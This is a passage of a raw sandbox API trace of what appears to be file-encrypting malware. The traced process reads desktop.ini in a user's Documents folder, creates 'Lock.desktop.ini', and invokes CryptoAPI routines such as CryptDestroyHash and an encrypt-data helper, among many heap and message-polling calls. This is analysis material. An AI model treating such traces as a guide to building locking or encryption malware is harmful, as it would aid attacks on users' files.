wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0262.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0262.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.859] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0262.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69ba8 [0262.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ba8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0262.860] CryptDestroyHash (hHash=0xa87250) returned 1 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0262.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0262.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0262.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0262.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0262.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0262.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0262.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0262.863] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.863] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0262.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0262.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0262.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0262.863] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0262.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0262.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0262.864] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0262.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0262.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0262.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0262.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0262.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0262.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0262.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0262.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0262.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0262.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0262.867] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0262.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0262.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0262.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0262.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0262.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125a020 [0262.872] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0262.873] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x192, lpOverlapped=0x0) returned 1 [0262.874] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0262.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0262.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0262.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x2e565e8 [0262.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125a020 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x2e561a8 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x2e565e8 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0262.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0262.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0262.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0262.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0262.879] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0262.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0262.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x2e565e8 [0262.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ff8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0262.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fa8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0262.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x192) returned 0x3be0048 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0262.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0262.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0262.881] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0262.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.882] PeekMessageW (in: 